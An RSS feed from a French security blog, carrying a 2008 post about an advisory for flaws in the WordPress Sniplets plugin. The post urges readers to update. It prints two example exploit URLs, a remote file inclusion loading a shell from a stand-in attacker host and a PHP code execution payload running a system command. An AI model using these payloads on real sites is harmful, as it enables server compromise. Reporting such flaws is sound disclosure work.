<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet title="XSL formatting" type="text/xsl" href="http://webfault.org/feed/rss2/xslt" ?><rss version="2.0"
  xmlns:dc="http://purl.org/dc/elements/1.1/"
  xmlns:wfw="http://wellformedweb.org/CommentAPI/"
  xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
  <title>Michael VERGOZ - Sniplets</title>
  <link>http://webfault.org/</link>
  <description></description>
  <language>fr</language>
  <pubDate>Wed, 25 Mar 2009 17:59:15 +0000</pubDate>
  <copyright>Copyright 2007 - Michael Vergoz</copyright>
  <docs>http://blogs.law.harvard.edu/tech/rss</docs>
  <generator>Dotclear</generator>
  
    
  <item>
    <title>Wordpress fait froid dans le dos</title>
    <link>http://webfault.org/post/2008/02/25/Wordpress-fait-froid-dans-le-dos</link>
    <guid isPermaLink="false">urn:md5:8c57fc363d9ab4ffeb11122084ce7b6b</guid>
    <pubDate>Mon, 25 Feb 2008 21:55:00 +0000</pubDate>
    <dc:creator>Michael Vergoz</dc:creator>
        <category>Securité</category>
        <category>advisory</category><category>failles</category><category>Remote Code Execution</category><category>Remote File Inclusion</category><category>Sniplets</category><category>spam</category><category>Wordpress</category>    
    <description>    &lt;p&gt;Tout à l'heure vers 18:00 GMT+4 je vois un &lt;a href=&quot;http://webfault.org/index.php?tag/advisory&quot;&gt;advisory&lt;/a&gt; sortir concernant le plugin &lt;a href=&quot;http://webfault.org/index.php?tag/Sniplets&quot;&gt;Sniplets&lt;/a&gt; de &lt;a href=&quot;http://webfault.org/index.php?tag/Wordpress&quot;&gt;Wordpress&lt;/a&gt;.&lt;/p&gt;


&lt;p&gt;Je ne fais pas plus attention que ça. L'&lt;a href=&quot;http://webfault.org/index.php?tag/advisory&quot;&gt;advisory&lt;/a&gt; compte trois &lt;a href=&quot;http://webfault.org/index.php?tag/failles&quot;&gt;failles&lt;/a&gt; dont deux que je considére comme critique. Une inclusion de fichiers distant (&lt;a href=&quot;http://webfault.org/index.php?tag/Remote%20File%20Inclusion&quot;&gt;Remote File Inclusion&lt;/a&gt;) et d'une execution de code PHP à distance (&lt;a href=&quot;http://webfault.org/index.php?tag/Remote%20Code%20Execution&quot;&gt;Remote Code Execution&lt;/a&gt;).&lt;/p&gt;

&lt;pre&gt;
Exemple du Remote File Inclusion
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?

Exemple du Remote Code Execution
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);
&lt;/pre&gt;


&lt;p&gt;Quelque heures plus tard nous commencons à recevoir une pluie de requêtes de &lt;a href=&quot;http://webfault.org/index.php?tag/spam&quot;&gt;spam&lt;/a&gt; sur nos sites venant de site piraté utilisant du &lt;a href=&quot;http://webfault.org/index.php?tag/Wordpress&quot;&gt;Wordpress&lt;/a&gt;.&lt;/p&gt;


&lt;p&gt;Après quelque minutes je me rend compte qu'il y a eu pas moins de 8 failles dans &lt;a href=&quot;http://webfault.org/index.php?tag/Wordpress&quot;&gt;Wordpress&lt;/a&gt; sur le mois de Février.&lt;/p&gt;


&lt;p&gt;Mettez à jour vos applications !&lt;/p&gt;


&lt;p&gt;&lt;a href=&quot;http://search.securityfocus.com/swsearch?query=wordpress&amp;amp;sbm=bid&amp;amp;submit=Search%21&amp;amp;metaname=alldoc&amp;amp;sort=swishlastmodified&quot;&gt;Liste de failles de Wordpress sur SecurityFocus&lt;/a&gt;&lt;/p&gt;</description>
    
    
    
      </item>
    
</channel>
</rss>